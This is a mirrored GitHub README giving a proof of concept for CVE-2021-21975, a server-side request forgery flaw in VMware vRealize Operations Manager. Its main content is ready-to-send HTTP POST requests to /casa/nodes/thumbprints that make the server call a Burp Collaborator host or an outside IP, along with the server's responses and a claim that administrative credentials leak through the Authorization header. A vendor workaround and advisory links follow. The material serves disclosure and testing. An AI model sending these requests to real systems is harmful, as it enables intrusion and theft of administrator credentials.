Git Product home page Git Product logo

cve-2021-21976's Introduction

[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)

vRealize Operations (vROps) is a tool that self-driving IT operations management powered by AI from apps to infrastructure to optimize, plan and scale VMware Cloud and HCI deployments while unifying public cloud monitoring. VMware vRealize Operations Manager API 8.4 and all previous versions are vulnerable to Server Side Request Forgery (SSRF) vulnerability. Successfully exploitation of this vulnerability may lead to read or update internal resources and also in this case, an attacker can easily steal administrative credentials of vROps server. With combining CVE-2021-21975 and CVE-2021-21983, an attacker can run arbitrary code on remote vRealize Operations server.

Proof of Concept (PoC): In order to exploit this vulnerability, you can use the following request

POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]

Response of the above request is down below

HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]

Screen Shot 2021-04-03 at 01 03 29

Screen Shot 2021-04-03 at 01 18 07

Also administrative credentials are disclosures in Authorization header.

Screen Shot 2021-04-03 at 01 19 39

Screen Shot 2021-04-03 at 01 24 34

Other Proof of Concepts (PoCs): Or you can use the following requests to detect CVE-2021-21975 VMware vRealize Operations Manager API Server Side Request Forgery (SSRF) vulnerability

POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]

HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]

Screen Shot 2021-04-03 at 00 00 20

POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]

HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]

Screen Shot 2021-04-03 at 00 01 00

Workaround Solution: If the patch cannot be installed, or there is no patch for your version of vRealize Operations, the following steps can be taken to workaround the issue. There is no impact to vRealize Operations when applying this workaround.

To work around this issue in vRealize Operations, remove a configuration line from casa-security-context.xml

  1. Log into the Primary node as root via SSH or Console, pressing ALT+F1 in a Console to log in
  2. Open /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml
  3. Find and remove the line: <sec:http pattern="/nodes/thumbprints" security='none'/>
  4. Save and close the file
  5. Restart the CaSA service with this command: service vmware-casa restart
  6. Repeat steps 1-5 on all other nodes in the vRealize Operations cluster.

For more information, visit the following pages.

https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html

cve-2021-21976's People

Contributors

murataydemir avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.